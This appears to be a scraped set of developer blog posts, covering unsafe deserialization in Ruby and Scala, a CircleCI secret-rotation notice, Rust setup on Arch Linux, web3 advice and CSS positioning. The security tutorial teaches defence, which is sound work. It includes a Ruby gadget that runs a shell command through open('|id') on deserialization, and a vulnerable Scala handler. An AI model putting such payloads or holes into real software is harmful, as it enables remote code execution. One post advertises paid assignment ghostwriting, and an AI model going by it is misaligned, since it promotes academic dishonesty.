- [Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
## Unsafe Deserialization in Ruby

Ruby uses the Marshal library to serialize and unserialize objects. For example, the following script creates an instance of the object User, serializes it, and then prints the string representation of the object.
```
User = Struct.new(:name, :role)
user = User.new('Mike', :admin)
puts Marshal.dump(user).inspect
# Prints the following string representation:
# "\x04\bS:\tUser\a:\tnameI\"\tMike\x06:\x06ET:\trole:\nadmin"
```
The string representation can then be deserialized again to recreate the object instance and access its attributes.
```
user = Marshal.load("\x04\bS:\tUser\a:\tnameI\"\tMike\x06:\x06ET:\trole:\nadmin")
print(user.name);
# It prints the following string:
# Mike
```
### Vulnerable Example
The exploitation of deserialization in Ruby happens when user-controlled input is passed as the first argument of the Marshal.load() function.
To be exploitable, the vulnerable piece of code must have enough Ruby code in scope to build a gadget chain, which means a chain of reusable code that causes a meaningful impact when invoked.
For example, assume that Marshal.load() deserializes user-provided data. An attacker could craft a malicious payload like the following one, which abuses an existing class to execute a command when deserialized.
```
class FSResource
  def initialize(path)
    @path = path
  end

  # Kernel#open runs a shell command when the path starts with a pipe character
  def to_s
    open(@path).read
  end
end

# Craft the payload to execute `id` via `open` instead of opening a file
obj = FSResource.new('|id')
payload = Marshal.dump(obj)

# Deserializing the payload rebuilds the object; the command runs as soon
# as `to_s` is invoked (here, by `puts`)
deserialized_obj = Marshal.load(payload)
puts deserialized_obj
# It prints the output of id:
# uid=1002(admin) gid=1002(admin) groups=1002(admin)
```
A number of real gadget chains against Ruby and Ruby on Rails have been discovered and published by security researchers in the past.
### References
[Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
[Ruby - Marshal](https://ruby-doc.org/core-2.6.3/Marshal.html)
[ZDI - Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization](https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization)
[ELTTAM - Ruby 2.x Universal RCE Deserialization Gadgets Chain](https://www.elttam.com/blog/ruby-deserialization/)
## Unsafe Deserialization in Scala
Scala, like Java, implements serialization natively for objects that implement the Serializable interface, via the ObjectInputStream and ObjectOutputStream facilities. The binary format references classes directly by name, and those classes are loaded dynamically provided they are on the class path. This potentially allows instantiating objects of classes the developer never intended, so it is very important that untrusted data is not deserialized as is.
Developers may customize some aspects of the serialization process by providing callbacks such as writeReplace and readResolve. An attacker can abuse these hooks by crafting complex objects whose deserialization eventually leads to code execution or other actions on the target. Especially when complex, well-known libraries and frameworks are on the class path, attackers may leverage publicly available tools such as ysoserial to easily craft an appropriate payload.
### Vulnerable Example
The following Play controller uses the data coming from the client request to deserialize an object:
```
def handler() =
  AuthAction(parse.multipartFormData) { implicit request => {
    request.body.file("file") match {
      case Some(file) => {
        // deserialize data from a Base64-encoded file upload
        val base64Data = new String(Files.readAllBytes(Paths.get(file.ref.path.toString()))).trim()
        val data = Base64.getDecoder().decode(base64Data)
        val ois = new ObjectInputStream(new ByteArrayInputStream(data))
        // `object` is a reserved word in Scala, so bind the result to `obj`
        val obj = ois.readObject().asInstanceOf[MyClass]
        ois.close()
        // ...
      }
      case None => InternalServerError("...")
    }
  }
}
```
### Prevention
Never pass user-supplied input to the Scala deserialization mechanism, and opt for data-only serialization formats such as JSON.
If the deserialization of untrusted data is really necessary, consider adopting an allow-list approach that permits only objects of certain classes to be deserialized.
It is possible to specialize the implementation of the ObjectInputStream object. The following snippet only allows instances of the MyClass class (and the Scala Option wrappers it may be nested in) to be deserialized:
```
class SafeInputStream(inputStream: InputStream) extends ObjectInputStream(inputStream) {
override def resolveClass(objectStreamClass: java.io.ObjectStreamClass): Class[_] = {
objectStreamClass.getName match {
case "MyClass" | "scala.Some" | "scala.Option" => super.resolveClass(objectStreamClass)
case _ => throw new InvalidClassException("Forbidden class", objectStreamClass.getName)
}
}
}
```
It is then possible to invoke the deserialization in the usual way:
```
val ois = new SafeInputStream(new ByteArrayInputStream(data))
val obj = ois.readObject().asInstanceOf[MyClass]
```
### References
[OWASP - Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
[Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
[Oracle - Serializable](https://docs.oracle.com/javase/7/docs/api/java/io/Serializable.html)
[Oracle - Serialization Filtering](https://docs.oracle.com/javase/10/core/serialization-filtering1.htm)
[GitHub - Ysoserial](https://github.com/frohoff/ysoserial)
---
Source: https://tutorialboy24.blogspot.com/2022/12/an-unsafe-deserialization-vulnerability.html | tutorialboy |
1,318,252 | Rotate your Circle CI keys now. | This morning many developers received an email informing them that CircleCI had been breached... | 0 | 2023-01-05T10:54:52 | https://dev.to/lukeecart/rotate-your-circle-ci-keys-now-3b14 | devops, news | This morning, many developers received an email informing them that CircleCI had been breached between 21st December 2022 and 4th January 2023.

Image from [https://www.bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/)
### Am I affected?
The statement says:
> "At this point, **we are confident that there are no unauthorized actors** active in our systems; however, out of an **abundance of caution**, we want to ensure that all customers take certain preventative measures to protect your data as well."
### What do I need to do?
The recommendation is to '**Immediately rotate any and all secrets stored in CircleCI**. These may be stored in project environment variables or in contexts.'
This includes SSH keys and other secrets.
### How do I rotate my keys?
To rotate keys, please refer to this documentation on CircleCI's website: [https://circleci.com/docs/managing-api-tokens/#rotating-a-project-api-token](https://circleci.com/docs/managing-api-tokens/#rotating-a-project-api-token)
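If you have many project environment variables to recreate, the cleanup can also be scripted against CircleCI's v2 REST API. The endpoint used below (`DELETE /v2/project/{project-slug}/envvar/{name}`) should be verified against the current API docs, and the project slug, variable name, and token in this sketch are placeholders:

```python
import urllib.request

API_BASE = "https://circleci.com/api/v2"

def delete_envvar_request(project_slug: str, name: str, token: str) -> urllib.request.Request:
    """Build (but do not send) the DELETE request for one project env var."""
    url = f"{API_BASE}/project/{project_slug}/envvar/{name}"
    req = urllib.request.Request(url, method="DELETE")
    req.add_header("Circle-Token", token)  # personal API token -- rotate this too!
    return req

# Placeholder values -- substitute your own, then send with urllib.request.urlopen(req)
req = delete_envvar_request("gh/acme/backend", "AWS_SECRET_ACCESS_KEY", "<personal-token>")
print(req.get_method(), req.full_url)
```

After deleting an old variable, add its replacement value through the UI or the corresponding POST endpoint, and remember that the API token used here should itself be rotated afterwards.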
### Do you have any questions?
Please see this tweet from CircleCI answering some common questions: [Tweet with common questions answered by a CircleCI engineer](https://twitter.com/CircleCI/status/1610893135235661830?cxt=HHwWjICyjbGxhdssAAAA)
Or add a question to the [CircleCI discussion board](https://discuss.circleci.com/t/circleci-security-alert-rotate-any-secrets-stored-in-circleci/46479)
### References:
- **CircleCI security alert** [https://circleci.com/blog/january-4-2023-security-alert/](https://circleci.com/blog/january-4-2023-security-alert/)
- **CircleCI Twitter account** [https://twitter.com/CircleCI](https://twitter.com/CircleCI)
- **Article about the CircleCI breach** [https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/](https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/)
| lukeecart |
1,320,448 | Rust on Arch Linux: Getting Started | Introduction: Rust (or rustlang) is one of the modern general-purpose programming languages. It is fast, safe, and productive. Rust... | 21,290 | 2023-01-07T02:35:09 | https://scqr.net/ja/blog/2023/01/07/rust-on-arch-linux-getting-started/index.html | rust, rustup, cargo, archlinux | ## Introduction
[Rust](https://www.rust-lang.org/) (or rustlang) is one of the modern general-purpose programming languages. It is fast, safe, and productive.
Rust has many features, such as the [functional programming](https://doc.rust-lang.org/book/ch13-00-functional-features.html) paradigm, [ownership](https://doc.rust-lang.org/book/ch04-01-what-is-ownership.html), and [zero-cost abstractions](https://doc.rust-lang.org/stable/embedded-book/static-guarantees/zero-cost-abstractions.html) (!). As for speed and safety, there is no GC, that is, no garbage collection, so Rust runs with very little memory and leaves no garbage behind. As for productivity, there is [cargo](https://doc.rust-lang.org/cargo/), a well-made package manager, as well as [rustup](https://rustup.rs/), an installer that handles [toolchains](https://rust-lang.github.io/rustup/concepts/toolchains.html) (the stable / beta / nightly release channels).
Rust is cross-platform: a single codebase can be compiled to run on a variety of platforms. Moreover, the output is a single binary, so the file size is optimized and therefore small. Here we can add one more of Rust's strengths: portability.
As for supported platforms, first there are Windows / Mac / Linux (Tier 1), and beyond those FreeBSD (Tier 2) and OpenBSD (Tier 3) are also included.
What is a tier? It is part of Rust's [platform support model](https://doc.rust-lang.org/rustc/platform-support.html), which consists of three tiers.
| Tier | Description |
| ----- | ----------- |
| 1 | "Guaranteed to work" (the official binary build process is automated, including testing) |
| 2 | "Guaranteed to build" (automated builds, with partially automated testing) |
| 3 | May not work correctly (supported in the codebase, but builds and tests are not automated) |
64-bit Linux (kernel 3.2+, glibc 2.17+) is Tier 1, the most thoroughly supported category !!
This article introduces how to install Rust on [Artix Linux](https://artixlinux.org/), an OS derived from [Arch Linux](https://archlinux.org/).
### Environment
- OS: Artix Linux (Arch Linux derivative)
- App: Rust [1.66.0](https://releases.rs/docs/1.66.0/)
- App toolchains installer: rustup 1.25.1
- Terminal: [Xfce4 Terminal](https://gitlab.xfce.org/apps/xfce4-terminal)
- IDE (& editor): [VSCodium](https://vscodium.com/) (or [VS Code](https://code.visualstudio.com/))
## Tutorial
`doas` can be replaced with [`sudo`](https://www.sudo.ws/) throughout ([`doas`](https://man.openbsd.org/doas) reference).
### Installation
Even when using [pacman](https://wiki.archlinux.org/title/Pacman), there are at least two options:
1. Installing Rust directly
2. Installing rustup and setting up a stable-channel environment
The latter is the officially recommended method, though it is not strictly required. To save time when just trying things out, you can take the former approach.
Both methods are shown below. Open a terminal and let's begin.
#### Installing Rust directly (Option 1)
```console
$ doas pacman -Sy rust
```
#### Installing rustup (Option 2)
```console
$ doas pacman -Sy rustup
```
Then run the following:
```console
$ rustup default stable
```
The output was as follows:
```console
info: syncing channel updates for 'stable-x86_64-unknown-linux-gnu'
info: latest update on 2022-12-15, rust version 1.66.0 (69f9c33d7 2022-12-12)
info: downloading component 'cargo'
info: downloading component 'clippy'
info: downloading component 'rust-docs'
info: downloading component 'rust-std'
info: downloading component 'rustc'
68.0 MiB / 68.0 MiB (100 %) 22.9 MiB/s in 2s ETA: 0s
info: downloading component 'rustfmt'
info: installing component 'cargo'
info: installing component 'clippy'
info: installing component 'rust-docs'
19.0 MiB / 19.0 MiB (100 %) 15.3 MiB/s in 1s ETA: 0s
info: installing component 'rust-std'
29.7 MiB / 29.7 MiB (100 %) 17.4 MiB/s in 1s ETA: 0s
info: installing component 'rustc'
68.0 MiB / 68.0 MiB (100 %) 19.7 MiB/s in 3s ETA: 0s
info: installing component 'rustfmt'
info: default toolchain set to 'stable-x86_64-unknown-linux-gnu'
stable-x86_64-unknown-linux-gnu installed - rustc 1.66.0 (69f9c33d7 2022-12-12)
```
Done 😉
As an aside, with rustup you can also install the nightly or beta channel instead of stable. Those channels can offer shorter compile times or richer (though likely still-in-testing) features.
### Creating a project
First, create a directory.
```console
$ mkdir my-first-rust-prj
$ cd my-first-rust-prj
```
Next, launch VSCodium (or VS Code) in that directory.
Press `Ctrl + Shift + @` on your keyboard to open the terminal.

Run [`cargo init`](https://doc.rust-lang.org/cargo/commands/cargo-init.html). This generates a cargo package:
```console
$ cargo init --bin .
```
Note that the `--bin` option matches the default behavior, so it can be omitted.
The output was as follows:
```
Created binary (application) package
```
You should now have the following: `Cargo.toml`, the project manifest definition; `Cargo.lock`, the dependency lock file; `src/main.rs`, the program entry point; and so on. Additionally, running [`cargo build`](https://doc.rust-lang.org/cargo/commands/cargo-build.html) generates a `target` directory.
```
.
├─.gitignore
├─src
├───main.rs
├─Cargo.lock
└─Cargo.toml
```
### Running the demo app
You now have a compilable set of files.
How do you actually compile it and run it as an app? Just run this:
```console
$ cargo run
```
The output was as follows:
```console
Compiling my-first-rust-prj v0.1.0 (/(...)/my-first-rust-prj)
Finished dev [unoptimized + debuginfo] target(s) in 0.26s
Running `target/debug/my-first-rust-prj`
Hello, world!
```
There we go! It printed "Hello, world!". Wonderful :)
Alternatively, you can build the binary and then run it manually.
```console
$ cargo build
Finished dev [unoptimized + debuginfo] target(s) in 0.00s
$ ./target/debug/my-first-rust-prj
Hello, world!
```
## Conclusion
Your first Rust project is now bootstrapped, and you can start developing right away.
Data processing, file I/O, controlling network connections, building servers, and more.
Enjoy your journey with Rust; it will be safe, powerful, fun, robust, and fascinating.
Bon voyage ;)
### References
- [The Rust Programming Language](https://doc.rust-lang.org/stable/book)
  - A really good book !!
- [Learn Rust](https://www.rust-lang.org/learn)
| nabbisen |
1,322,291 | Hire Affordable Engineering Assignment Helper In the USA | Excellent Advantages of our Engineering assignment help services Students from around the globe can... | 0 | 2023-01-09T09:46:40 | https://dev.to/jaccymice/hire-affordable-engineering-assignment-helper-in-the-usa-3n03 | webdev | Excellent Advantages of our Engineering assignment help services
Students from around the globe can use our engineering assignment help online. Thousands of students rely on our support when it comes to finishing their academic work, because we have been in this sector for a very long time and are aware of the crucial variables that must be taken into account when writing your assignment. We have consistently been able to deliver top-notch content that helps students achieve good marks in line with expectations. And do you know the best part? With our [Online Engineering Assignment Help](https://www.assignmenthelppro.com/us/engineering-assignment-help/) in the USA, we also give our customers access to special benefits and services!
On-time delivery: We never miss deadlines, because we know how important it is for you to turn in your work by the specified date. As soon as we receive your order, our team of USA-based engineering assignment helpers gets to work.
Plagiarism-free content: We write every assignment entirely from scratch, and our team constantly ensures that your project is completely free of plagiarism. If you would like, we can also provide a plagiarism report for your assignment.
Affordable prices: A student's budget is quite tight. We are aware of this! Because of this, our engineering assignment help services are offered at a very affordable price, with additional discounts that students can take advantage of as needed.
24/7 customer support: You never have to worry when contacting our team of engineering assignment helpers in the USA, because we are available 24/7. This means that our experts will give you prompt answers to all of your questions.
| jaccymice |
1,324,716 | Why You Should Not Learn Web3 As A Beginner | There are a few reasons why someone who is just starting to learn about programming and web... | 0 | 2023-01-11T07:02:09 | https://dev.to/shoyeb001/why-you-should-not-learn-web3-as-a-beginner-4f1k | beginners, web3, webdev, career | There are a few reasons why someone who is just starting to learn about programming and web development may not want to immediately dive into learning about **web3 and blockchain technology**.
### New Technology
Web3 and blockchain are relatively new and rapidly evolving technologies. This means that there is a lot of uncertainty and change in the ecosystem, which can make it difficult to know what to learn and where to focus your efforts. Additionally, the technology is still evolving and many of the use cases for it are not yet fully realized, which can make it difficult to see the practical applications of what you are learning.
### Complex For Beginners
Web3 and blockchain development can be quite complex and difficult to understand for beginners. These technologies involve advanced concepts such as cryptography, decentralized networks, and smart contracts, which can be challenging to grasp without prior knowledge and experience. Additionally, because these technologies are new and evolving, there may not be as many resources and tutorials available to help beginners learn the basics.
### Fundamental Concepts
If you are just starting to learn programming, it may be more beneficial to focus on more fundamental concepts and skills before diving into web3 and blockchain development. By learning the basics of programming languages such as JavaScript, Python, or Java, you will be building a strong foundation that will serve you well as you continue to learn and grow as a developer.
### Smaller Job Market
It's also worth noting that the job market for web3 and blockchain developers is still relatively small and niche. While the demand for these skills is increasing, it's not yet clear how the market will evolve and mature. As a beginner, it may be more beneficial to focus on learning web development skills that are more in demand, such as full-stack JavaScript or Java development. This will give you a better chance of finding a job and building a career in the short-term.
### Decentralization Concepts
One important thing about web3 is that it requires a good understanding of the concept of decentralization and how it works. This is not easy for a beginner developer to grasp and takes a lot of time to get familiar with, so it may be a good idea to first learn more about the general concepts of decentralization, distributed systems, and consensus algorithms before diving into the specifics of web3 and blockchain development.
### Conclusion
While web3 and blockchain technology have a lot of potential and are exciting to learn about, as a beginner, it may not be the best idea to immediately dive into learning about them. It may be more beneficial to focus on building a solid foundation in programming and web development, and to gain a better understanding of the concepts of decentralization before diving into more specialized and complex technologies like web3 and blockchain.
It's important to keep in mind that learning web3 and blockchain is not a must; it's just one of many technologies out there, and there is always something new and interesting to learn. It's up to you to find the area that interests you the most and focus on that.
1,325,431 | Applying CSS Positioning Properties | In this article, you’ll learn what CSS positioning properties are, the different CSS positioning property values, and how you can apply them to your web page. | 0 | 2023-01-11T16:31:13 | https://code.pieces.app/blog/applying-css-positioning-properties | css | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/csspositionproperty_0f78273793e3918dd872670f22199887.jpg" alt="Applying CSS Positioning Properties."/></figure>
CSS positioning properties enhance the user experience on your page. Also, they allow you to position elements and contents on a web page differently. In this article, you’ll learn what CSS positioning properties are, the different CSS position property values, and how you can apply them to your web page.
## What is the Position Property in CSS?
The CSS position property describes the type of positioning method used for an element and its placement on a web page. It lets you set a location explicitly, allowing you to move your elements around on the page. In addition, you can use the top, left, right, and bottom properties to give the document any look you want. For example, setting one of these properties to 0 places the element flush against the corresponding edge of its positioned parent or of the viewport.
## Why Use CSS Positioning?
We use positioning properties in CSS for many reasons:
- To enhance your design skills and improve the user experience on your page
- To specify where an element is displayed on the page
- To give the [design layout a compelling visual appeal](https://code.pieces.app/blog/using-css-flexbox-in-building-layouts)
- To enable you to exploit a component's location, allowing you to move your piece around the page
- To make your design more accessible and understandable
- To let you determine the final area of the element
## How to Use Position Property in CSS
Before diving into this topic, you should realize that even without CSS, your HTML element already has predefined rules on how it should be displayed on a web page. Therefore, it’s important to understand how things are positioned by default before changing or bending them at will. Also, bear in mind that all HTML elements are static by default. Here is how the CSS positioning property works:
- The position property in CSS helps specify elements' positions on a web page.
- Whether an element appears within the normal flow of the document depends on the position value applied.
- The CSS positioning property works with the box offset properties `left`, `right`, `top`, and `bottom`, which describe the final position of elements by moving them in different directions.
- The box offset properties only take effect once a non-static position value has been set; on statically positioned elements they do nothing.
## CSS Positioning Property Values
The CSS positioning property has several values that influence how it works. These include the following:
### Static Position
[Static positioning](https://developer.mozilla.org/en-US/docs/Web/CSS/position) keeps an element in the normal flow of the page and ignores any box offset property; it is the default. The top, bottom, left, and right properties do not affect it. Note that a statically positioned element has no special position; it is always placed according to the normal flow of the page.
Let’s look at this example of a single `div` element with a static position:
**Example:**
```
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-color: #73AD21;
}
.box {
width: 400px;
height: 200px;
background-color: white;
}
</style>
</head>
<body>
<div class="box"></div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=871f4db05c)
Here is the result of the above code:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image11_7a56ddfed6d62ccb6073434483d766eb.png" alt="White rectangle in the upper left corner of a large green rectangle."/></figure>
Now, let's try to move it around with the left property:
```
.box {
width: 400px;
height: 200px;
background-color: white;
position: static;
left: 70px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=4b4f468499)
Here is the result of the above:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image11_246d95e27620e14f55e4fa18d722c9cb.png" alt="White rectangle in the upper left corner of a larger green rectangle."/></figure>
Notice that there is no difference in the image. Static positioning is not affected by the `top`, `bottom`, `left`, and `right` properties.
### CSS Relative Position
A [relatively positioned](https://developer.mozilla.org/en-US/docs/Web/CSS/position#:~:text=A%2520relatively%2520positioned%2520element%2520is,properties%2520specify%2520the%2520horizontal%2520offset.) element is offset relative to its normal position on the page. Setting its top, right, bottom, and left properties shifts it away from that normal position. However, the space the element originally occupied is preserved; surrounding content does not shift to fill the gap. When a relatively positioned element moves, nothing else on the screen is affected: everything else flows as if the element had never moved.
Note that setting the position property alone does nothing; it only takes effect once you use one of the coordinating properties. You set the movement values using top, bottom, left, and right, which push the box away from the named edge of the element's current position. It is essential to note that the element moves away from the edge named by the property, not toward it. For example:
- Set the positive value for the `left` property to move an element to the right.
- Set the positive value for the `right` property to move an element to the left.
- Set the positive value for the `bottom` property to move an element up.
- Set the positive value for the `top` property to move an element down.
We'll center the child boxes inside the parent element to make the movements in the relative-positioning examples easier to follow:
```
<!DOCTYPE html>
<html>
<head>
<style>
.parent {
background-color: #73AD21;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
height: 500px;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
}
.box3 {
width: 200px;
height: 100px;
background-color: red;
}
</style>
</head>
<body>
<div class="parent">
<div class="box1"></div>
<div class="box2"></div>
<div class="box3"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=0e5d47ac0b)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image12_c720d43eca90a247c1df32b730937796.png" alt="White, yellow, and red rectangles in the center of a larger green rectangle."/></figure>
Now, let’s add the position property CSS relative to our code to move the box around:
```
<!DOCTYPE html>
<html>
<head>
<style>
.parent {
background-color: #73AD21;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
height: 500px;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: relative;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: relative;
}
.box3 {
width: 200px;
height: 100px;
background-color: red;
position: relative;
}
</style>
</head>
<body>
<div class="parent">
<div class="box1"></div>
<div class="box2"></div>
<div class="box3"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=6e784f8759)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image9_215669f96df219354d9fc04ce7e44456.png" alt="White, yellow, and red rectangles in the middle of a larger green rectangle."/></figure>
Observe that nothing changes. This is because `position: relative` by itself does nothing to the elements; change only happens once you add one of the coordinating properties: left, right, top, or bottom.
Next, let's move the element (`box1`) to the left and down:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: relative;
right: 250px;
top: 90px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=295345984b)
Let's look at the result to better understand how to set the value of the properties:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image13_830fbba71d13e9fbe69f0b6fb248d0f7.png" alt="A white rectangle in the lower left corner and yellow and red rectangles in the middle of a larger green rectangle."/></figure>
Notice that to move the element to the left, you set a value on the right property; to move it down, you set a value on the top property. Also, the surrounding content behaves as if the element were still in its original place.
Now, let's move the element (`box2`) to the right and up:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: relative;
left: 100px;
bottom: 70px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=21cb459ba7)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image3_6e2d3b4cb762604d73b6050d92a6a96f.png" alt="Three rectangles in the middle of a larger green rectangle. Two of the rectangles overlap."/></figure>
Remember that the left property was set to move the element to the right, and the bottom property to move it up. In addition, the element's movement did not push down or otherwise influence the other elements on the screen.
### Absolute Position
An [absolutely positioned](https://developer.mozilla.org/en-US/docs/Web/CSS/position#:~:text=An%2520absolutely%2520positioned%2520element%2520is,which%2520the%2520element%2520is%2520positioned.) element is placed relative to its nearest positioned ancestor. The element is removed from the normal document flow, and no gap is created for it in the page layout. Instead, the left, top, bottom, and right values determine the element's final position.
Note that an absolutely positioned element with no positioned ancestor uses the document body and moves along with page scrolling. Absolutely positioned elements can also overlap other content.
For better understanding, we’ll work with these elements to explain how absolute positioning works:
```
<!DOCTYPE html>
<html>
<head>
<style>
body{
background-color: #73AD21;
}
.container {
background-color: red;
border: solid 3px blue;
display: flex;
align-items: center;
justify-content: center;
width: 500px;
height: 400px;
position: relative;
}
.box1 {
width: 200px;
height: 100px;
background-color: white;
}
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
}
</style>
</head>
<body>
<div class="container">
<div class="box1"></div>
<div class="box2"></div>
</div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=d98f48bcad)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image2_944cb9e5c4effdd38c508128c838be79.png" alt="A red square inside a green rectangle. White and yellow rectangles in the middle of the red square."/></figure>
Now, we'll move the boxes. As mentioned earlier, an absolutely positioned element is placed relative to its positioned parent element.
Let's place `box1` 50px from the parent element's left edge and 40px from its top edge:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
top: 40px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=bd784dab70)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image5_d099265ddb211095c803d0d8b53f6dcb.png" alt="White and yellow rectangles in the upper left corner of a red square in a green rectangle."/></figure>
Notice that the element was taken out of the document's normal flow, unlike the relative positioning, which leaves a space for a ghost element.
Next, let's place the `box1` element 50px from the left edge and flush with the top (a top offset of 0) of its parent element:
```
.box1 {
width: 200px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
top: 0;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=50ee41a237)
Here is the outcome:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image14_13adc1871909c9407051417329aa4511.png" alt="White and yellow rectangles in a red square in a green rectangle."/></figure>
The above image shows how `box1` is positioned relative to its parent element.
Now, let's place the `box2` element 50px from the parent element's right edge and 40px from its bottom edge:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: absolute;
right: 50px;
bottom: 40px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=3905459324)
Here is the effect of the code:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image1_606b7319294f035c5e74c600c2d0fd2c.png" alt="White and yellow rectangles in the lower right corner of a red square inside a green rectangle."/></figure>
Notice that the element is removed from the normal flow of the page. Also, the coordinating properties work as written, unlike relative positioning, where you set the right property to move left.
Next, let's place the `box2` element 50px from the right edge and flush with the bottom (a bottom offset of 0) of its parent element:
```
.box2 {
width: 200px;
height: 100px;
background-color: yellow;
position: absolute;
right: 50px;
bottom: 0;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=8297449705)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image8_7672ee93047287793f7e822601999029.png" alt="White and yellow rectangles in a red square in a green rectangle."/></figure>
This shows that `box2` element is positioned relative to its parent element, which has a bottom margin of 0.
### Fixed Position
An element with [a fixed position](https://www.w3.org/wiki/CSS_absolute_and_fixed_positioning?source=post_page#:~:text=Fixed%2520positioning%2520is%2520really%2520just,position%2520inside%2520the%2520browser%2520window.) is similar to an absolutely positioned element, but it is positioned relative to the viewport, so it always remains in the same place even when you scroll through the page. A fixed element is removed from the normal flow and does not leave a gap where it would have been. The `top`, `right`, `left`, and `bottom` properties position it within the viewport. Note that fixed elements are not affected by scrolling; they stay in the same position on the screen.
We’ll use this image, which shows the white and yellow elements before we scroll down, to explain the fixed position:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image10_d8bdc65195f7b16ab0f023798d1f8bc1.png" alt="White and yellow squares on top of red text."/></figure>
Now, let’s use two box elements to explain the fixed position. To do this, we’ll set the `box1` (white) element as the absolute position and the `box2` (yellow) element as the fixed position:
```
<style>
body{
background-color: #73AD21;
}
.container {
background-color: red;
border: solid 3px blue;
display: flex;
overflow: scroll;
align-items: center;
justify-content: center;
width: 500px;
height: 400px;
position: relative;
}
.box1 {
width: 100px;
height: 100px;
background-color: white;
position: absolute;
left: 50px;
}
.box2 {
width: 100px;
height: 100px;
background-color: yellow;
position: fixed;
}
</style>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=464a4f8dc0)
Here is the result:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image7_c21d580cf1dec47521cb4ef2884fc30b.png" alt="White and yellow squares on top of red text."/></figure>
Notice that the `box2` (yellow) element was not affected by the scrolling; it remained fixed in the same position on the screen.
### Sticky Position
[A sticky position](https://blog.hubspot.com/website/css-position-sticky) positions an element based on the user's scroll position. It combines relative and fixed positioning, depending on the scroll: the element behaves as relatively positioned until a given offset is met in the viewport, and then it "sticks" in place like a fixed element.
Let’s look at this example for a better understanding of how the sticky position works:
```
<style>
.container {
background-color: grey;
border: solid 3px blue;
width: 600px;
height: 400px;
overflow: scroll;
}
.sticky {
background-color: white;
width: 100px;
height: 100px;
position: sticky;
top:0;
}
</style>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=af3c48b4dc)
Below are the results of the element before and after we scroll.
The image before the scrolling:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image6_83218c1e92a976b9367436571dec9c79.png" alt="A white square between two paragraphs."/></figure>
The image after scrolling:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image4_08ce271e0d5934e9215c5f9ed769d42b.png" alt="The white square is now in the upper left corner of the rectangle."/></figure>
Notice that the white element maintained a relative position until it met the specified top scroll position of `top:0`. Then, it acts as a fixed position element and sticks to the specified spot.
## Conclusion
